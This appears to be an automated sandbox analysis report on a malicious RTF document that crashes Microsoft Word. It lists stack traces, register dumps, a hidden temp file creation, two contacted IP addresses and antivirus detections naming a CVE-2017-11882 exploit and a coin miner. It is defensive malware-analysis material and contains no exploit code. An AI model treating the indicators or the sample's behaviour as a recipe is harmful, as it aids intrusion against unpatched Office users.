__exception__ April 13, 2021, 9:13 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418 DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431 DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4 wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3689032 registers.edi: 1957755408 registers.eax: 3689032 registers.ebp: 3689112 registers.edx: 0 registers.ebx: 4712380 registers.esi: 2147944126 registers.ecx: 3350582440	1	0	0
__exception__ April 13, 2021, 9:13 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418 DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431 DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4 wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3688724 registers.edi: 1957755408 registers.eax: 3688724 registers.ebp: 3688804 registers.edx: 0 registers.ebx: 4711876 registers.esi: 2147944122 registers.ecx: 3350582440	1	0	0

Application Crash

Process WINWORD.EXE with pid 3332 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

April 13, 2021, 9:13 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

__exception__

April 13, 2021, 9:13 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3688724
registers.edi: 1957755408
registers.eax: 3688724
registers.ebp: 3688804
registers.edx: 0
registers.ebx: 4711876
registers.esi: 2147944122
registers.ecx: 3350582440

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 13, 2021, 9:12 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000003e4 filepath: C:\Users\test22\AppData\Local\Temp\~$...........................................................dot desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$...........................................................dot create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

RTF file has an unknown version (1 event)

filetype_details

Rich Text Format data, unknown version

filename

.............................................................dot

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	23.95.122.25

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

MicroWorld-eScan	Exploit.RTF-ObfsObjDat.Gen
FireEye	Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal	Exp.RTF.Obfus.Gen
McAfee	Exploit-CVE2017-11882.bw
Arcabit	Exploit.RTF-ObfsObjDat.Gen
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of DOC/Abnormal.A
BitDefender	Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus	Exploit.Rtf.Heuristic-rtf.dinbqn
Ad-Aware	Exploit.RTF-ObfsObjDat.Gen
Emsisoft	Exploit.RTF-ObfsObjDat.Gen (B)
TrendMicro	HEUR_RTFMALFORM
McAfee-GW-Edition	Exploit-CVE2017-11882.bw
Ikarus	Win32.Outbreak
Avira	HEUR/Rtf.Malformed
GData	Exploit.RTF-ObfsObjDat.Gen
Cynet	Malicious (score: 99)
AhnLab-V3	RTF/Malform-A.Gen
ALYac	Exploit.RTF-ObfsObjDat.Gen
MAX	malware (ai score=83)
Zoner	Probably Heur.RTFBadVersion
TACHYON	Trojan-Exploit/RTF.CVE-2017-11882
Fortinet	RTF/CoinMiner.N!tr

.............................................................dot

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All